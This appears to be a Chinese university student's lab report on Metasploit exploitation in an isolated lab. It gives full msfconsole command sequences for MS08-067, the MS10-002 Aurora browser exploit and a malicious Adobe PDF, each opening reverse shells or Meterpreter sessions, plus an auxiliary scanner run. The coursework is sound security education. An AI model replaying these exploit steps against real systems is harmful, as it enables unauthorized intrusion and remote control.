• 20192406梁健 202120222 《网络与系统攻防技术》实验六实验报告


    20192406梁健 2021-2022-2 《网络与系统攻防技术》实验六实验报告

    1.实验内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.1 一个主动攻击实践,尽量使用最新的类似漏洞;

    1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

    1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

    1.4 成功应用任何一个辅助模块。

    以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除1分。

    2.实验过程

    1.1 一个主动攻击实践,尽量使用最新的类似漏洞;

    漏洞:MS08_067

    攻击机: Win10 (IP:192.168.0.101)

    靶机:Win2kServer (IP:192.168.192.130)

    在Win输入msfconsole进入控制台后依次输入以下指令:

    采用默认LHOST:192.168.0.101,默认端口LPORT:4444,默认目标target:0

    msf6 > use exploit/windows/smb/ms08_067_netapi
    msf6 exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
    msf6 exploit(ms08_067_netapi) > set RHOST 192.168.192.130
    msf6 exploit(ms08_067_netapi) > exploit
    

    1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

    漏洞:MS10_002

    攻击机: Win10 (IP:192.168.43.182)

    靶机:WinXP (IP:192.168.192.131)

    在Win10输入msfconsole进入控制台后依次输入以下指令:

    msf6 > use exploit/windows/browser/ms10_002_aurora
    msf6 exploit(windows/browser/ms10_002_aurora) > set srvhost 192.168.43.182
    msf6 exploit(windows/browser/ms10_002_aurora) > set uripath \admin
    msf6 exploit(windows/browser/ms10_002_aurora) > set Lhost 192.168.43.182
    msf6 exploit(windows/browser/ms10_002_aurora) > set Lport 4444
    msf6 exploit(windows/browser/ms10_002_aurora) > exploit
    

    结果:Using URL: http://192.168.43.182:8080/admin

    在靶机IE浏览器中和输入URL并转到

    成功反弹连接,输入ipconfig命令查看靶机信息

    1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

    漏洞:adobe_cooltype_sing

    攻击机: Win10 (IP:192.168.43.182)

    靶机:WinXP (IP:192.168.192.131)

    在Win10输入msfconsole进入控制台后依次输入以下指令:

    msf6 > use windows/fileformat/adobe_cooltype_sing
    msf6 exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 
    msf6 exploit(adobe_cooltype_sing) > set LHOST 192.168.43.182
    msf6 exploit(adobe_cooltype_sing) > set LPORT 4444
    msf6 exploit(adobe_cooltype_sing) > set FILENAME 20192406.pdf
    msf6 exploit(adobe_cooltype_sing) > exploit
    

    在Win10输入msfconsole进入控制台后依次输入以下指令:

    msf6 > use exploit/multi/handler
    msf6 exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf6 exploit(handler) > set LHOST 192.168.43.182
    msf6 exploit(handler) > set LPORT 4444
    msf6 exploit(handler) > exploit
    

    在靶机中打开pdf文件

    成功反弹连接,输入ipconfig命令查看靶机信息

    1.4 成功应用任何一个辅助模块。

    辅助模块:scanner/http/backup_file

    攻击机: Win10 (IP:192.168.43.182)

    靶机:WinXP (IP:192.168.192.131)

    在Win10输入msfconsole进入控制台后依次输入以下指令:

    msf6 exploit(multi/handler) > use scanner/http/backup_file
    msf6 auxiliary(scanner/http/backup_file) > set rhost 192.168.192.131
    msf6 auxiliary(scanner/http/backup_file) > run
    
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    

    查看辅助模块信息和执行成功显示

    3.问题及解决方案

    • 问题1:在利用MS10_018攻击浏览器时无法成功。
    • 问题1解决方案:换成MS10_002就成功了。
    • 问题2:在攻击Adobe时无法成功。
    • 问题2解决方案:后发现是版本太高,改成低版本的就可以成功了。

    4.学习感悟、思考等

    实验主要掌握三种不同的MSF漏洞攻击应用,即主动攻击、针对浏览器的攻击和针对客户端的攻击.本次实验难点主要在靶机的版本上,由于每个攻击版本要求不同,每次攻击时都需要下不同的镜像还有软件,比较费时费力。不过最终还是在比较简单的层面实现了所有的小项。

  • 相关阅读:
    齐文词根词缀---3.12、ced-走
    感悟总结---2104012起(文字收集)
    齐文词根词缀---3.11、log说话
    齐文词根词缀---3.10、cata-向下(和cat,cad,cid,cis是一样的)
    齐文词根词缀---3.9、carn-肉、肉欲
    齐文词根词缀---3.8、capit-头(cap帽子)
    齐文词根词缀---3.7、-tect盖子
    齐文词根词缀---3.6、cant-唱、说
    齐文词根词缀---3.5、cad- / cas- 落下(【音变t-d-s】)
    CURL 发送POST请求
  • 原文地址:https://www.cnblogs.com/lj2406/p/16248937.html
Copyright © 2020-2023  润新知